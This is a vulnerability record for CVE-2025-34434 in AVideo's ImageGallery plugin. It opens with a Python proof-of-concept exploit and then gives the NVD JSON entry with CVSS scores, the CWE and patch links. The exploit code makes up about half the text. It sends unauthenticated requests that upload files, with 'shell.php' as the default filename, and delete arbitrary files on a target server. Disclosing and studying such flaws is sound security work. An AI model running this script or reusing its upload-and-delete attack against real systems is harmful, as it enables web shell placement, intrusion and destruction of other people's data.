CVE-2025-34434

# CVE-2025-34434 AVideo ImageGallery Unauthenticated File Upload/Deletion PoC # Reference: https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion import requests import sys import argparse TARGET = "http://target-avideo-server.com" def upload_file(target_url, file_path, filename="shell.php"): """Upload arbitrary file to AVideo server via vulnerable ImageGallery endpoint""" upload_url = f"{target_url}/plugin/ImageGallery/uploadImage.php" try: with open(file_path, 'rb') as f: files = {'file': (filename, f, 'image/jpeg')} data = {'videoId': '1', 'galleryId': '1'} response = requests.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: print(f"[+] File uploaded successfully!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except Exception as e: print(f"[-] Error uploading file: {str(e)}") return False def delete_file(target_url, file_path): """Delete arbitrary file from AVideo server via vulnerable ImageGallery endpoint""" delete_url = f"{target_url}/plugin/ImageGallery/deleteImage.php" try: data = { 'file': file_path, 'confirm': '1' } response = requests.post(delete_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] File deleted successfully!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Delete failed with status: {response.status_code}") return False except Exception as e: print(f"[-] Error deleting file: {str(e)}") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-34434 PoC') parser.add_argument('--target', default=TARGET, help='Target AVideo server URL') parser.add_argument('--upload', help='File to upload') parser.add_argument('--delete', help='File path to delete') parser.add_argument('--filename', default='shell.php', help='Filename for upload') args = parser.parse_args() if args.upload: upload_file(args.target, args.upload, args.filename) if args.delete: delete_file(args.target, args.delete) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-34434", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:53.740", "lastModified": "2025-12-19T19:15:50.810", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 with the ImageGallery plugin enabled is vulnerable to unauthenticated file upload and deletion. Plugin endpoints responsible for managing gallery images fail to enforce authentication checks and do not validate ownership, allowing unauthenticated attackers to upload or delete images associated with any image-based video."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/c279999cbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}